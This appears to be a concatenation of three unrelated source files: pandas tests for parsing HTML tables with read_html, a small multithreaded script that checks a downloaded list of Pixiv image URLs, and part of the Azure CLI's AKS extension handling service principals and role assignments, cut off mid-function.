def test_colspan_rowspan_both_not_1(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B b b C
# a b b b D
result = self.read_html("""
<table>
<tr>
<td rowspan="2">A</td>
<td rowspan="2" colspan="3">B</td>
<td>C</td>
</tr>
<tr>
<td>D</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B', 'B', 'B', 'D']],
columns=['A', 'B', 'B.1', 'B.2', 'C'])
tm.assert_frame_equal(result, expected)
def test_rowspan_at_end_of_row(self):
# GH17054
# In ASCII, with lowercase letters being copies:
#
# A B
# C b
result = self.read_html("""
<table>
<tr>
<td>A</td>
<td rowspan="2">B</td>
</tr>
<tr>
<td>C</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['C', 'B']], columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_rowspan_only_rows(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<td rowspan="3">A</td>
<td rowspan="3">B</td>
</tr>
</table>
""", header=0)[0]
expected = DataFrame(data=[['A', 'B'], ['A', 'B']],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_header_inferred_from_rows_with_only_th(self):
# GH17054
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<th>a</th>
<th>b</th>
</tr>
<tr>
<td>1</td>
<td>2</td>
</tr>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_parse_dates_list(self):
df = DataFrame({'date': date_range('1/1/2001', periods=10)})
expected = df.to_html()
res = self.read_html(expected, parse_dates=[1], index_col=0)
tm.assert_frame_equal(df, res[0])
res = self.read_html(expected, parse_dates=['date'], index_col=0)
tm.assert_frame_equal(df, res[0])
def test_parse_dates_combine(self):
raw_dates = Series(date_range('1/1/2001', periods=10))
df = DataFrame({'date': raw_dates.map(lambda x: str(x.date())),
'time': raw_dates.map(lambda x: str(x.time()))})
res = self.read_html(df.to_html(), parse_dates={'datetime': [1, 2]},
index_col=1)
newdf = DataFrame({'datetime': raw_dates})
tm.assert_frame_equal(newdf, res[0])
def test_computer_sales_page(self, datapath):
data = datapath('io', 'data', 'computer_sales_page.html')
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html(data, header=[0, 1])
data = datapath('io', 'data', 'computer_sales_page.html')
assert self.read_html(data, header=[1, 2])
def test_wikipedia_states_table(self, datapath):
data = datapath('io', 'data', 'wikipedia_states.html')
assert os.path.isfile(data), '%r is not a file' % data
assert os.path.getsize(data), '%r is an empty file' % data
result = self.read_html(data, 'Arizona', header=1)[0]
assert result['sq mi'].dtype == np.dtype('float64')
def test_parser_error_on_empty_header_row(self):
with tm.assert_raises_regex(ParserError,
r"Passed header=\[0,1\] are "
r"too many rows for this "
r"multi_index of columns"):
self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
</thead>
<tbody>
<tr><td>a</td><td>b</td></tr>
</tbody>
</table>
""", header=[0, 1])
def test_decimal_rows(self):
# GH 12907
result = self.read_html('''<html>
<body>
<table>
<thead>
<tr>
<th>Header</th>
</tr>
</thead>
<tbody>
<tr>
<td>1100#101</td>
</tr>
</tbody>
</table>
</body>
</html>''', decimal='#')[0]
expected = DataFrame(data={'Header': 1100.101}, index=[0])
assert result['Header'].dtype == np.dtype('float64')
tm.assert_frame_equal(result, expected)
def test_bool_header_arg(self):
# GH 6114
for arg in [True, False]:
with pytest.raises(TypeError):
self.read_html(self.spam_data, header=arg)
def test_converters(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
converters={'a': str}
)[0]
expected = DataFrame({'a': ['0.763', '0.244']})
tm.assert_frame_equal(result, expected)
def test_na_values(self):
# GH 13461
result = self.read_html(
"""<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> 0.763</td>
</tr>
<tr>
<td> 0.244</td>
</tr>
</tbody>
</table>""",
na_values=[0.244])[0]
expected = DataFrame({'a': [0.763, np.nan]})
tm.assert_frame_equal(result, expected)
def test_keep_default_na(self):
html_data = """<table>
<thead>
<tr>
<th>a</th>
</tr>
</thead>
<tbody>
<tr>
<td> N/A</td>
</tr>
<tr>
<td> NA</td>
</tr>
</tbody>
</table>"""
expected_df = DataFrame({'a': ['N/A', 'NA']})
html_df = self.read_html(html_data, keep_default_na=False)[0]
tm.assert_frame_equal(expected_df, html_df)
expected_df = DataFrame({'a': [np.nan, np.nan]})
html_df = self.read_html(html_data, keep_default_na=True)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_preserve_empty_rows(self):
result = self.read_html("""
<table>
<tr>
<th>A</th>
<th>B</th>
</tr>
<tr>
<td>a</td>
<td>b</td>
</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
""")[0]
expected = DataFrame(data=[['a', 'b'], [np.nan, np.nan]],
columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html("""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
""")[0]
columns = MultiIndex(levels=[['A', 'B'], ['a', 'b']],
labels=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(data=[("Hillary", 68, "D"),
("Bernie", 74, "D"),
("Donald", 69, "R")])
expected_df.columns = [["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1",
"Unnamed: 2_level_1"]]
html = expected_df.to_html(index=False)
html_df = self.read_html(html, )[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath('io', 'data', 'valid_markup.html')
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath('io', 'data', 'banklist.html')
self.read_html(banklist_data, '.*Water.*', flavor=['lxml', 'html5lib'])
def test_to_html_timestamp(self):
rng = date_range('2000-01-01', periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert '2000-01-01' in result
@pytest.mark.parametrize("displayed_only,exp0,exp1", [
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"]))])
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO("""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>""")
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
def test_encode(self, html_encoding_file):
_, encoding = os.path.splitext(
os.path.basename(html_encoding_file)
)[0].split('_')
try:
with open(html_encoding_file, 'rb') as fobj:
from_string = self.read_html(fobj.read(), encoding=encoding,
index_col=0).pop()
with open(html_encoding_file, 'rb') as fobj:
from_file_like = self.read_html(BytesIO(fobj.read()),
encoding=encoding,
index_col=0).pop()
from_filename = self.read_html(html_encoding_file,
encoding=encoding,
index_col=0).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if '16' in encoding or '32' in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get('flavor') == 'lxml':
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO('''
<table><tr><td>spam<foobr />eggs</td></tr></table>''')
assert self.read_html(bad)
with pytest.raises(ValueError,
match='passed a non-rewindable file object'):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile(object):
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = '' if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
good = MockFile('<table><tr><td>spam<br />eggs</td></tr></table>')
bad = MockFile('<table><tr><td>spam<foobr />eggs</td></tr></table>')
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super(ErrorThread, self).run()
except Exception as e:
self.err = e
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath('io', 'data', 'valid_markup.html')
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
|
main.py | import requests
import threading
import os
import time
link_url = "https://raw.githubusercontent.com/codingbox/Pixiv-Craw/main/url.txt"
os.system("curl -O " + link_url)
url_list = []
f = open("url.txt", "r")
line = f.readline()
while line:
url_list.append(line.rstrip('\n'))
line = f.readline()
url_list_ok = []
def request_url(n, k):
for i in range(0, len(url_list)):
if i % n != k:
continue
try:
r = requests.get(url_list[i])
print("pic " + url_list[i] + " " + (str)(r.status_code))
if (r.status_code == 200):
url_list_ok.append(url_list[i])
except:
print("Error " + url_list[i])
threads = []
for i in range(0, 10):
threads.append(threading.Thread(target = request_url, args=(10, i)))
for i in range(0, 10):
threads[i].start()
for i in range(0, 10):
threads[i].join()
with open("url_ok.txt", 'a') as f:
f.seek(0)
f.truncate()
for pic_url in url_list_ok:
f.write(pic_url + "\n")
os.remove("url.txt")
|
custom.py | # pylint: disable=too-many-lines
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import binascii
import datetime
import errno
import json
import os
import os.path
import platform
import re
import ssl
import stat
import subprocess
import sys
import tempfile
import threading
import time
import uuid
import base64
import webbrowser
from distutils.version import StrictVersion
from math import isnan
from six.moves.urllib.request import urlopen # pylint: disable=import-error
from six.moves.urllib.error import URLError # pylint: disable=import-error
import requests
from knack.log import get_logger
from knack.util import CLIError
from knack.prompting import prompt_pass, NoTTYException
import yaml # pylint: disable=import-error
from dateutil.relativedelta import relativedelta # pylint: disable=import-error
from dateutil.parser import parse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
import colorama # pylint: disable=import-error
from tabulate import tabulate # pylint: disable=import-error
from azure.cli.core.api import get_config_dir
from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id
from azure.cli.core.keys import is_valid_ssh_rsa_public_key
from azure.cli.core.util import get_file_json, in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac.models import (ApplicationCreateParameters,
PasswordCredential,
KeyCredential,
ServicePrincipalCreateParameters,
GetObjectsParameters)
from .vendored_sdks.azure_mgmt_preview_aks.v2020_11_01.models import (ContainerServiceLinuxProfile,
ManagedClusterWindowsProfile,
ContainerServiceNetworkProfile,
ManagedClusterServicePrincipalProfile,
ContainerServiceSshConfiguration,
ContainerServiceSshPublicKey,
ManagedCluster,
ManagedClusterAADProfile,
ManagedClusterAddonProfile,
ManagedClusterAgentPoolProfile,
AgentPool,
AgentPoolUpgradeSettings,
ContainerServiceStorageProfileTypes,
ManagedClusterIdentity,
ManagedClusterAPIServerAccessProfile,
ManagedClusterSKU,
ManagedClusterIdentityUserAssignedIdentitiesValue,
ManagedClusterAutoUpgradeProfile,
KubeletConfig,
LinuxOSConfig,
SysctlConfig,
ManagedClusterPodIdentityProfile,
ManagedClusterPodIdentity,
ManagedClusterPodIdentityException,
UserAssignedIdentity)
from ._client_factory import cf_resource_groups
from ._client_factory import get_auth_management_client
from ._client_factory import get_graph_rbac_management_client
from ._client_factory import get_msi_client
from ._client_factory import cf_resources
from ._client_factory import get_resource_by_name
from ._client_factory import cf_container_registry_service
from ._client_factory import cf_storage
from ._client_factory import cf_agent_pools
from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type,
_set_outbound_type, _parse_comma_separated_list,
_trim_fqdn_name_containing_hcp)
from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided,
update_load_balancer_profile, create_load_balancer_profile)
from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME
from ._consts import CONST_MONITORING_ADDON_NAME
from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME
from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME
from ._consts import CONST_AZURE_POLICY_ADDON_NAME
from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_ADDON_NAME
from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME
from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID
from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE
from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE
from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED
from ._consts import CONST_OPEN_SERVICE_MESH_ADDON_NAME
from ._consts import CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE
from ._consts import ADDONS
logger = get_logger(__name__)
def which(binary):
path_var = os.getenv('PATH')
if platform.system() == 'Windows':
binary = binary + '.exe'
parts = path_var.split(';')
else:
parts = path_var.split(':')
for part in parts:
bin_path = os.path.join(part, binary)
if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK):
return bin_path
return None
def wait_then_open(url):
"""
Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL.
"""
for _ in range(1, 10):
try:
urlopen(url, context=_ssl_context())
except URLError:
time.sleep(1)
break
webbrowser.open_new_tab(url)
def wait_then_open_async(url):
"""
Spawns a thread that waits for a bit then opens a URL.
"""
t = threading.Thread(target=wait_then_open, args=({url}))
t.daemon = True
t.start()
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret):
# use get_progress_controller
hook = cli_ctx.get_progress_controller(True)
hook.add(messsage='Creating service principal', value=0, total_val=1.0)
logger.info('Creating service principal')
# always create application with 5 years expiration
start_date = datetime.datetime.utcnow()
end_date = start_date + relativedelta(years=5)
result = create_application(rbac_client.applications, name, url, [url], password=client_secret,
start_date=start_date, end_date=end_date)
service_principal = result.app_id # pylint: disable=no-member
for x in range(0, 10):
hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0)
try:
create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client)
break
# TODO figure out what exception AAD throws here sometimes.
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
time.sleep(2 + 2 * x)
else:
return False
hook.add(message='Finished service principal creation', value=1.0, total_val=1.0)
logger.info('Finished service principal creation')
return service_principal
def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0)
logger.info('Waiting for AAD role to propagate')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0)
try:
# TODO: break this out into a shared utility library
create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope)
break
except CloudError as ex:
if ex.message == 'The role assignment already exists.':
break
logger.info(ex.message)
except: # pylint: disable=bare-except
pass
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role propagation done', value=1.0, total_val=1.0)
logger.info('AAD role propagation done')
return True
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _get_default_dns_prefix(name, resource_group_name, subscription_id):
# Use subscription id to provide uniqueness and prevent DNS name clashes
name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10]
if not name_part[0].isalpha():
name_part = (str('a') + name_part)[0:10]
resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16]
return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6])
# pylint: disable=too-many-locals
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cmd, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.cli.core.profiles import ResourceType
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES,
subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
validation_poller = smc.validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, deployment)
if validate:
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password=password, key_value=key_value, key_type=key_type,
key_usage=key_usage, start_date=start_date, end_date=end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, is_service_principal, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx,
role, assignee, resource_group_name,
scope, resolve_assignee=is_service_principal)
def _create_role_assignment(cli_ctx, role, assignee,
resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
# XXX: if role is uuid, this function's output cannot be used as role assignment defintion id
# ref: https://github.com/Azure/azure-cli/issues/2458
role_id = _resolve_role_id(role, scope, definitions_client)
# If the cluster has service principal resolve the service principal client id to get the object id,
# if not use MSI object id.
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None,
scope=None, include_inherited=False, yes=None):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
ids = ids or []
if ids:
if assignee or role or resource_group_name or scope or include_inherited:
raise CLIError('When assignment ids are used, other parameter values are not required')
for i in ids:
assignments_client.delete_by_id(i)
return
if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]):
from knack.prompting import prompt_y_n
msg = 'This will delete all role assignments under the subscription. Are you sure?'
if not prompt_y_n(msg, default="n"):
return
scope = _build_role_scope(resource_group_name, scope,
assignments_client.config.subscription_id)
assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited,
include_groups=False)
if assignments:
for a in assignments:
assignments_client.delete_by_id(a.id)
def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None):
# AAD can have delays in propagating data, so sleep and retry
hook = cli_ctx.get_progress_controller(True)
hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0)
logger.info('Waiting for AAD role to delete')
for x in range(0, 10):
hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0)
try:
delete_role_assignments(cli_ctx,
role=role,
assignee=service_principal,
scope=scope)
break
except CLIError as ex:
raise ex
except CloudError as ex:
logger.info(ex)
time.sleep(delay + delay * x)
else:
return False
hook.add(message='AAD role deletion done', value=1.0, total_val=1.0)
logger.info('AAD role deletion done')
return True
def _search_role_assignments(cli_ctx, assignments_client, definitions_client,
scope, assignee, role, include_inherited, include_groups):
assignee_object_id = None
if assignee:
assignee_object_id = _resolve_object_id(cli_ctx, assignee)
# always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups
if scope:
assignments = list(assignments_client.list_for_scope(
scope=scope, filter='atScope()'))
elif assignee_object_id:
if include_groups:
f = "assignedTo('{}')".format(assignee_object_id)
else:
f = "principalId eq '{}'".format(assignee_object_id)
assignments = list(assignments_client.list(filter=f))
else:
assignments = list(assignments_client.list())
if assignments:
assignments = [a for a in assignments if (
not scope or
include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or
_get_role_property(a, 'scope').lower() == scope.lower()
)]
if role:
role_id = _resolve_role_id(role, scope, definitions_client)
assignments = [i for i in assignments if _get_role_property(
i, 'role_definition_id') == role_id]
if assignee_object_id:
assignments = [i for i in assignments if _get_role_property(
i, 'principal_id') == assignee_object_id]
return assignments
def _get_role_property(obj, property_name):
if isinstance(obj, dict):
return obj[property_name]
return getattr(obj, property_name)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
if len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
_re_user_assigned_identity_resource_id = re.compile(
r'/subscriptions/(.*?)/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)',
flags=re.IGNORECASE)
def _get_user_assigned_identity(cli_ctx, resource_id):
msi_client = get_msi_client(cli_ctx)
resource_id = resource_id.lower()
match = _re_user_assigned_identity_resource_id.search(resource_id)
if match:
resource_group_name = match.group(2)
identity_name = match.group(3)
try:
identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name,
resource_name=identity_name)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("Identity {} not found.".format(resource_id))
raise CLIError(ex.message)
return identity
raise CLIError("Cannot parse identity name from provided resource id {}.".format(resource_id))
def _get_user_assigned_identity_client_id(cli_ctx, resource_id):
return _get_user_assigned_identity(cli_ctx, resource_id).client_id
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def aks_browse(cmd, # pylint: disable=too-many-statements,too-many-branches
client,
resource_group_name,
name,
disable_browser=False,
listen_address='127.0.0.1',
listen_port='8001'):
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
cmd.cli_ctx.cloud.endpoints.portal + # Azure Portal URL (https://portal.azure.com for public cloud)
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning('To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
